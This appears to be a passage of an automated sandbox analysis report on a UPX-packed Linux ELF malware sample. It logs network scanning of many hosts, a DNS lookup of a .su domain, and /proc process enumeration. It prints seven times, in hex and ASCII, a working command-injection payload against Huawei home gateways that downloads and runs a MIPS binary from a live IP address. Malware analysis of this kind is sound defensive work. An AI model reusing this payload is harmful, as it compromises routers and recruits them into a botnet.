Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Sample listens on a socket

Source: /tmp/GZBCPDzO6n.elf (PID: 5430)

Socket: 127.0.0.1::8345

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 197.212.106.121
Source: unknown	TCP traffic detected without corresponding DNS query: 197.174.135.120
Source: unknown	TCP traffic detected without corresponding DNS query: 197.183.115.110
Source: unknown	TCP traffic detected without corresponding DNS query: 197.44.191.167
Source: unknown	TCP traffic detected without corresponding DNS query: 197.251.79.46
Source: unknown	TCP traffic detected without corresponding DNS query: 197.247.245.215
Source: unknown	TCP traffic detected without corresponding DNS query: 197.206.175.163
Source: unknown	TCP traffic detected without corresponding DNS query: 197.0.80.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.3.217.144
Source: unknown	TCP traffic detected without corresponding DNS query: 197.72.18.244
Source: unknown	TCP traffic detected without corresponding DNS query: 197.147.16.117
Source: unknown	TCP traffic detected without corresponding DNS query: 197.142.59.42
Source: unknown	TCP traffic detected without corresponding DNS query: 197.109.191.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.185.211.71
Source: unknown	TCP traffic detected without corresponding DNS query: 197.22.28.98
Source: unknown	TCP traffic detected without corresponding DNS query: 197.68.131.208
Source: unknown	TCP traffic detected without corresponding DNS query: 197.248.141.96
Source: unknown	TCP traffic detected without corresponding DNS query: 197.172.252.17
Source: unknown	TCP traffic detected without corresponding DNS query: 197.24.143.44
Source: unknown	TCP traffic detected without corresponding DNS query: 197.97.41.32
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.95.66
Source: unknown	TCP traffic detected without corresponding DNS query: 197.106.122.239
Source: unknown	TCP traffic detected without corresponding DNS query: 197.135.180.43
Source: unknown	TCP traffic detected without corresponding DNS query: 197.207.238.227
Source: unknown	TCP traffic detected without corresponding DNS query: 197.122.216.169
Source: unknown	TCP traffic detected without corresponding DNS query: 197.45.11.31
Source: unknown	TCP traffic detected without corresponding DNS query: 197.43.117.133
Source: unknown	TCP traffic detected without corresponding DNS query: 197.235.194.84
Source: unknown	TCP traffic detected without corresponding DNS query: 197.232.119.47
Source: unknown	TCP traffic detected without corresponding DNS query: 197.227.160.153
Source: unknown	TCP traffic detected without corresponding DNS query: 197.90.163.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.227.138.149
Source: unknown	TCP traffic detected without corresponding DNS query: 197.8.245.82
Source: unknown	TCP traffic detected without corresponding DNS query: 197.18.43.241
Source: unknown	TCP traffic detected without corresponding DNS query: 197.220.166.138
Source: unknown	TCP traffic detected without corresponding DNS query: 197.44.203.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.242.91.79
Source: unknown	TCP traffic detected without corresponding DNS query: 197.84.161.130
Source: unknown	TCP traffic detected without corresponding DNS query: 197.73.91.220
Source: unknown	TCP traffic detected without corresponding DNS query: 197.80.125.123
Source: unknown	TCP traffic detected without corresponding DNS query: 197.189.57.158
Source: unknown	TCP traffic detected without corresponding DNS query: 197.76.235.108
Source: unknown	TCP traffic detected without corresponding DNS query: 197.97.215.33
Source: unknown	TCP traffic detected without corresponding DNS query: 197.43.88.206
Source: unknown	TCP traffic detected without corresponding DNS query: 197.105.109.85
Source: unknown	TCP traffic detected without corresponding DNS query: 197.30.101.175
Source: unknown	TCP traffic detected without corresponding DNS query: 197.29.159.199
Source: unknown	TCP traffic detected without corresponding DNS query: 197.44.107.84
Source: unknown	TCP traffic detected without corresponding DNS query: 197.55.14.170
Source: unknown	TCP traffic detected without corresponding DNS query: 197.31.158.60

Source: unknown

DNS traffic detected: queries for: sex.secure-cyber-security-rebirthltd.su

Source: unknown

Source: GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp	String found in binary or memory: http://79.110.62.86/srep.mips;
Source: GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: GZBCPDzO6n.elf	String found in binary or memory: http://upx.sf.net

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x8000

Source: classification engine

Classification label: mal88.troj.evad.linELF@0/0@25/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Enumerates processes within the "proc" file system

Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111117/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111113/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
